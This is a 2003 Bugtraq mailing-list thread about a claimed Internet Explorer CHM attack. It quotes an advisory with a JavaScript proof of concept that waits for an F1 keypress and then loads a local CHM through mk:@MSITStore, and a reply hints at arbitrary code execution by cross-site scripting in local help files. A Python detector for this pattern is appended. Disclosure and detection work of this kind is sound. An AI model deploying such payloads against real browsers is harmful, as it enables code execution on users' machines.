
Re: IE: CHM Attacks are still alive (CHM attack without showHelp())



Arman,

I tried this and set up a test with your code at
http://ip3e83566f.speed.planet.nl/iran.htm
It does nothing on my patched IE6 SP1. Where were you testing on?
IE6 SP1 by default disallows access to local resources, so this is exactly
what it should do.
As Andreas pointed out, if you are using a different version of IE that
doesn't do this, there is no risk as it's not opened inside the help viewer.
It seems to me this is a non-issue.

Andreas,

Correct, but I thought about it, and the adodb trick I posted about on
Full-Disclosure
(http://www.mail-archive.com/full-disclosure@xxxxxxxxxxxxxxxx/msg06847.html)
can most likely be used.

Since help files are located on the local filesystem and are opened in the
local zone, this should work. I attached a test file that suggests that it
probably would.
This means you can get arbitrary code execution if you somehow manage to
XSS a local CHM file.

241 CHM files in my c:\windows\help, have fun.


----- Original Message ----- 
From: "Andreas Sandblad" <sandblad@xxxxxxxxxx>
To: "Arman Nayyeri" <arman-n@xxxxxxxxxxxx>
Cc: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Thursday, September 04, 2003 9:27 AM
Subject: Re: IE: CHM Attacks are still alive (CHM attack without showHelp())


> In order to use the shortcut command your code must be launched
> in HTML Help. Simply linking to contents inside a chm file with the
> mk: protocol will not do the trick since you are still operating inside
> IE. That is the reason why you didn't get the chm file to execute
> programs using the shortcut command.
>
> I believe MS successfully secured showHelp(...) to stop various attacks
> using the shortcut command (including Sandblad #10).
>
> /Andreas Sandblad
>
> On Tue, 2 Sep 2003, Arman Nayyeri wrote:
>
> >
> >
> >                               !! R/\/\an#0001 !!
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > CHM Attacks are still alive
> > ===========================
> > Title:    CHM Attacks are still alive
> > Date:     Tuesday, September 02, 2003
> > Software: IE (What a nice program!!!)
> > Vendor:   Microsoft Corp. (I love Microsoft)
> > Patch:    N/A
> > Author:   Arman Nayyeri, arman-n@xxxxxxxxxxxx
> >
> >
> > Vendor Status:
> > ==============
> > Microsoft was not contacted, because I don't know the email address of
> > Microsoft.
> >
> >
> > Description:
> > ============
> >
> > After releasing the MS03-004 patch, it is still possible to execute a CHM
> > file without using the showHelp() command.
> > We can use mk:@MSITStore to execute CHM files, but with some tricks.
> >
> > 1. First we must have a help window opened in order for the CHM file to
> > work correctly.
> >
> > 2. We must open a window (or an iframe) that points to
> > mk:@MSITStore:pathof.chm::/compiledhtmlfilewithinchm.html
> >
> > The first one is hard, but easy with the help of the user.
> > We can tell the user to press the F1 key, then by using an onkeydown event
> > go to step 2.
> > As easy as this!!!!!
> > The Microsoft patch just stops the showHelp() functionality, but it is
> > still possible.
> > If you use a URL for the CHM file, it will open and show the content of the
> > file but does not execute programs, without generating any errors. (I
> > tested it on one CHM file, you can try more, maybe it works!)
> > But in the case of Sandblad #11, I can't produce it without showHelp(),
> > and I need the help of Andreas.
> > Andreas!, I believe that it will work, so try it!!
> >
> > Exploit
> > =======
> > As you can see, here is the simple JavaScript code that I wrote to
> > exploit this.
> > You must:
> > 1. Make a CHM file and save it as c:\msit.chm (download a free tool for
> > making a CHM file from http://go.microsoft.com/fwlink/?LinkId=14188 )
> > 2. Remove all ! from the script
> > 3. Create an HTML file and copy the code into that
> > 4. Open the HTML page and press the F1 key (at the top left corner of your
> > keyboard)
> > (you may need to increase the Timeout to allow the IE help to be opened)
> >
> > -------------------------------BEGINNING OF FILE---------------------------
> > <!h2>You should press "F1" key (at the top left corner of your keyboard)
> > </h2>
> > <!script>
> > function gotKey(){
> > if (event.keyCode==112){
> > setTimeout(
> > function () {
> >    document.write('<iframe id=I1
> > src="mk:@MSITStore:c:\\msit.chm::/page.html"></'+'iframe><br><h3>I Love
> > IRAN<br>R/\/\an#0001</h3>');
> > },
> > 1194
> > );
> > }
> > }
> > document.onkeydown = gotKey;
> > <!/script>
> > ---------------------------------END OF FILE------------------------------
> >
> >
> > Disclaimer:
> > ===========
> > Arman Nayyeri is not responsible for the misuse of the information
> > provided in this advisory. The opinions expressed are my own and not of
> > any company. In no event shall the author be liable for any damages
> > whatsoever arising out of or in connection with the use or spread of this
> > advisory. Any use of the information is at the user's own risk.
> >
> >
> > Please Contact Me:
> > ==================
> > arman-n@xxxxxxxxxxxx
> >
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Arman Nayyeri
> > MCP, MCSE 2000(in next two weeks)
> >
> > Semnan, IRAN (IRAN IS MY COUNTRY, I LOVE IRAN!!!)
> >
>
> -- 
>     _     _
>   o' \,=./ `o
>      (o o)
> -ooO--(_)--Ooo-

Attachment: testing.zip
Description: Binary data
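The pattern the quoted advisory describes, an HTML page that waits for an F1 keypress in an onkeydown handler and only then loads a local CHM through mk:@MSITStore, can be screened for in saved HTML content. The following Python is an added example for that screening, not code from the thread or from Arman; its sample pages are constructed, and the verdict thresholds are the author's own assumption.

```python
import re

# Constructed sample pages, not files from the thread. The first mirrors the
# shape of the advisory's page: an onkeydown handler that waits for F1
# (keyCode 112) and then writes an iframe pointing at a local CHM.
SUSPICIOUS_HTML = r"""<h2>You should press "F1"</h2>
<script>
function gotKey(){
  if (event.keyCode==112){
    setTimeout(function () {
      document.write('<iframe id=I1 src="mk:@MSITStore:c:\\msit.chm::/page.html"></iframe>');
    }, 1194);
  }
}
document.onkeydown = gotKey;
</script>"""
# A plain help link with no key handler: worth noting, but not the full pattern.
HELP_LINK_HTML = '<a href="mk:@MSITStore:C:\\Windows\\Help\\example.chm::/intro.htm">help</a>'
BENIGN_HTML = "<html><body><h1>Hello</h1></body></html>"

MSITSTORE_RE = re.compile(r"mk:@MSITStore:[^\"'\s>]+", re.IGNORECASE)
LOCAL_PATH_RE = re.compile(r"mk:@MSITStore:[a-z]:[\\/]", re.IGNORECASE)  # drive-letter path
F1_CHECK_RE = re.compile(r"keyCode\s*={2,3}\s*112")                        # F1 is keyCode 112
KEYDOWN_RE = re.compile(r"onkeydown", re.IGNORECASE)


def find_msitstore_refs(html):
    """Return every mk:@MSITStore URL in the document, in order."""
    return MSITSTORE_RE.findall(html)


def assess_html(html):
    """Score one HTML document against the F1-then-local-CHM pattern."""
    refs = find_msitstore_refs(html)
    local_refs = [r for r in refs if LOCAL_PATH_RE.match(r)]
    # The advisory's trick needs HTML Help to be open first; the page arranges
    # that by waiting for F1 inside an onkeydown handler before loading the CHM.
    waits_for_f1 = bool(KEYDOWN_RE.search(html) and F1_CHECK_RE.search(html))
    if local_refs and waits_for_f1:
        verdict = "high"      # local CHM loaded only after an F1 keypress
    elif refs:
        verdict = "medium"    # CHM content referenced, no key-handler gating
    else:
        verdict = "none"
    return {"refs": refs, "local_refs": local_refs,
            "waits_for_f1": waits_for_f1, "verdict": verdict}


if __name__ == "__main__":
    for name, page in [("suspicious", SUSPICIOUS_HTML),
                       ("help_link", HELP_LINK_HTML), ("benign", BENIGN_HTML)]:
        print(name, assess_html(page)["verdict"])
```

A "medium" hit on a legitimate help link is expected; the point of the check is the combination of a drive-letter CHM path with a handler gating on F1, which is what separates the advisory's page from an ordinary help link.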